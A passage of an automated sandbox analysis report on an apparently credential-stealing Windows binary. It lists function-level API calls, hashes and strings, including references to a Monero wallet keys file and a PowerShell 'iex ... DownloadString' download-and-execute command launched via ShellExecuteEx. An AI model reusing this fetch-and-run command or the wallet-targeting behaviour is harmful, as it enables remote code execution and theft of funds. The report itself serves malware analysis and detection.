                                        • Opcode ID: 66b767a018333c4c3d67124f7ee629b5ca5390678e3c691f779695214f600d08
                                        • Instruction ID: 01937cd967e6ff2c470efe13f816e7c85505cbf3854da1e1d4235f286fcc2e36
                                        • Opcode Fuzzy Hash: 66b767a018333c4c3d67124f7ee629b5ca5390678e3c691f779695214f600d08
                                        • Instruction Fuzzy Hash: D301F4B5A44309BFEB04DBE4DC49FAE7778FB48700F108599F605A6281D7B85A10CBA4
                                        Function 004F9470 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNEL32(>=O,80000000,00000003,00000000,00000003,00000080,00000000,?,004F3D3E,?), ref: 004F948C
                                        • GetFileSizeEx.KERNEL32(000000FF,>=O), ref: 004F94A9
                                        • CloseHandle.KERNEL32(000000FF), ref: 004F94B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSize
                                        • String ID: >=O$>=O
                                        • API String ID: 1378416451-2321104598
                                        • Opcode ID: d21db310b930ca3b88b8e4ed012d3297ad60587c181e70663a8c0dfe65f26c0e
                                        • Instruction ID: 3cbfc6e6c3580d14c02d5f2c4c1bbb4393769897dc5aae0bb7b239fc61da54b5
                                        • Opcode Fuzzy Hash: d21db310b930ca3b88b8e4ed012d3297ad60587c181e70663a8c0dfe65f26c0e
                                        • Instruction Fuzzy Hash: CFF03135E0820CBBDB14DFB4DC49F5E77B9AB98710F10C655FA11A7280D6789A01CB54
                                        Function 004EA110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004EA13C
                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 004EA161
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 004EA181
                                        • ReadFile.KERNEL32(000000FF,?,00000000,004E148F,00000000), ref: 004EA1AA
                                        • LocalFree.KERNEL32(004E148F), ref: 004EA1E0
                                        • CloseHandle.KERNEL32(000000FF), ref: 004EA1EA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                        • String ID:
                                        • API String ID: 2311089104-0
                                        • Opcode ID: 77f37f90752850c313f747313a49c2dc61850a9608b5cbe66238f6a0c32eff92
                                        • Instruction ID: bef16fb7505f7fcc0b3654851fc5d47fd407edf1e25fe1bafefa93f8a56a94a3
                                        • Opcode Fuzzy Hash: 77f37f90752850c313f747313a49c2dc61850a9608b5cbe66238f6a0c32eff92
                                        • Instruction Fuzzy Hash: DB312F74A00209EFDB14CF95C885FEEB7B5BF48305F108159E911A7390D778AA91CFA5
                                        Function 004F49D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrcat.KERNEL32(?,0145E358), ref: 004F4A2B
                                          • Part of subcall function 004F8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004F8F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F4A51
                                        • lstrcat.KERNEL32(?,?), ref: 004F4A70
                                        • lstrcat.KERNEL32(?,?), ref: 004F4A84
                                        • lstrcat.KERNEL32(?,0144BAC0), ref: 004F4A97
                                        • lstrcat.KERNEL32(?,?), ref: 004F4AAB
                                        • lstrcat.KERNEL32(?,0145DB80), ref: 004F4ABF
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004F8F20: GetFileAttributesA.KERNEL32(00000000,?,004E1B94,?,?,0050577C,?,?,00500E22), ref: 004F8F2F
                                          • Part of subcall function 004F47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004F47D0
                                          • Part of subcall function 004F47C0: RtlAllocateHeap.NTDLL(00000000), ref: 004F47D7
                                          • Part of subcall function 004F47C0: wsprintfA.USER32 ref: 004F47F6
                                          • Part of subcall function 004F47C0: FindFirstFileA.KERNEL32(?,?), ref: 004F480D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                        • String ID:
                                        • API String ID: 2540262943-0
                                        • Opcode ID: cf3e262bb54edbaef711ebd90b8e5da4449c6a32e1e028011808f5c0ef39bcf6
                                        • Instruction ID: b5132beaffa3310e609909b0bb345d933badea75c3cc93da3dcc398e4115ceec
                                        • Opcode Fuzzy Hash: cf3e262bb54edbaef711ebd90b8e5da4449c6a32e1e028011808f5c0ef39bcf6
                                        • Instruction Fuzzy Hash: 363132B290021C67DF15E7B0DC95EED7338AB48704F40468EB355AA051DE78AA88CB98
                                        Function 004F2EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 004F2FD5
                                        Strings
                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 004F2F14
                                        • ')", xrefs: 004F2F03
                                        • <, xrefs: 004F2F89
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 004F2F54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        • API String ID: 3031569214-898575020
                                        • Opcode ID: d3aa4a4cfbec60d0aebc46bd1a21c543a219d3b19cbecd13897ad8bfe569daf1
                                        • Instruction ID: 53472e74ecbe114eefdfddc47e3857cdd356d144bc535d42fa6af9a0c70fbfab
                                        • Opcode Fuzzy Hash: d3aa4a4cfbec60d0aebc46bd1a21c543a219d3b19cbecd13897ad8bfe569daf1
                                        • Instruction Fuzzy Hash: 72410BB190020C9ADB14EFA1C8A6BFDBB79AF10304F40455EE20A77196DF782A59CF59
                                        Function 004F4300 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,0145DA80,00000000,00020119,?), ref: 004F4344
                                        • RegQueryValueExA.ADVAPI32(?,0145E388,00000000,00000000,00000000,000000FF), ref: 004F4368
                                        • RegCloseKey.ADVAPI32(?), ref: 004F4372
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F4397
                                        • lstrcat.KERNEL32(?,0145E2C8), ref: 004F43AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 690832082-0
                                        • Opcode ID: 4b334372bc49d316d97c083977285bd8ec997a3e4bfac3a5beedfdcb4ea5a84f
                                        • Instruction ID: eabde9f1986aaba6bec3e0fa8bfd81ae0ab97a001739f893925d11afe22412f7
                                        • Opcode Fuzzy Hash: 4b334372bc49d316d97c083977285bd8ec997a3e4bfac3a5beedfdcb4ea5a84f
                                        • Instruction Fuzzy Hash: 974196B690010C6BDF14EBA0EC46FFE733CAB88300F00865DB71556181EE7D5A88CBA5
                                        Function 0055CBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: dllmain_raw$dllmain_crt_dispatch
                                        • String ID:
                                        • API String ID: 3136044242-0
                                        • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                        • Instruction ID: 724d4a980bd977a2359795c85860e3e22e17eae4c310c575ee611e69edabb4fc
                                        • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                        • Instruction Fuzzy Hash: 0C21AE72D40759AFDB229E15CC569BF3E79FB81B92F05415BFC286B210C3308D498BA0
                                        Function 004F6BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemTime.KERNEL32(?), ref: 004F6C0C
                                        • sscanf.NTDLL ref: 004F6C39
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004F6C52
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004F6C60
                                        • ExitProcess.KERNEL32 ref: 004F6C7A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$System$File$ExitProcesssscanf
                                        • String ID:
                                        • API String ID: 2533653975-0
                                        • Opcode ID: 6387252e162361e2466f6b5b50a3b8d5ae58dd9e2e7f85197d019452333fd81c
                                        • Instruction ID: d2eb16e62088fa7fd28ffaee23da29c7567e77f6db1d65f041d94c08ee667b4e
                                        • Opcode Fuzzy Hash: 6387252e162361e2466f6b5b50a3b8d5ae58dd9e2e7f85197d019452333fd81c
                                        • Instruction Fuzzy Hash: 9421ADB5D1420D9BCF08EFE4E945AEEB7B5BF48304F04856EE516B3250EB389604CB69
                                        Function 004F7F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F7FC7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F7FCE
                                        • RegOpenKeyExA.ADVAPI32(80000002,0144BF90,00000000,00020119,?), ref: 004F7FEE
                                        • RegQueryValueExA.ADVAPI32(?,0145DA00,00000000,00000000,000000FF,000000FF), ref: 004F800F
                                        • RegCloseKey.ADVAPI32(?), ref: 004F8022
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: ff5f8acdc2ec7f05c76175159ccfa8fab74dddec26ab96b19e57f4b39ac278f5
                                        • Instruction ID: 3b9f397c7b2c0335ec7c1259a1ac10a3aa4ab999993567e78248693559bdc94d
                                        • Opcode Fuzzy Hash: ff5f8acdc2ec7f05c76175159ccfa8fab74dddec26ab96b19e57f4b39ac278f5
                                        • Instruction Fuzzy Hash: 9E110DB1A44209AFD704CF94DD45FBBBBB8FB44B10F108219F615AA280DB795904CBA5
                                        Function 004F93F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • StrStrA.SHLWAPI(0145DF68,00000000,00000000,?,004E9F71,00000000,0145DF68,00000000), ref: 004F93FC
                                        • lstrcpyn.KERNEL32(007B7580,0145DF68,0145DF68,?,004E9F71,00000000,0145DF68), ref: 004F9420
                                        • lstrlen.KERNEL32(00000000,?,004E9F71,00000000,0145DF68), ref: 004F9437
                                        • wsprintfA.USER32 ref: 004F9457
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpynlstrlenwsprintf
                                        • String ID: %s%s
                                        • API String ID: 1206339513-3252725368
                                        • Opcode ID: 855ccb3c4f0ca7c6b0ac5abefe0790280e1caf24774bfd0eeb11f05b7040a6c5
                                        • Instruction ID: 5e65f8a1ed7f59a83a3594ec7088223d19261d665ac3101851b22f54eb69f027
                                        • Opcode Fuzzy Hash: 855ccb3c4f0ca7c6b0ac5abefe0790280e1caf24774bfd0eeb11f05b7040a6c5
                                        • Instruction Fuzzy Hash: 9A01DE7550810CFFCB18DFA8C948FAE7B78FF88304F108258F9099B244D639AA51DBA4
                                        Function 004E12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004E12B4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004E12BB
                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004E12D7
                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004E12F5
                                        • RegCloseKey.ADVAPI32(?), ref: 004E12FF
                                        Memory Dump Source
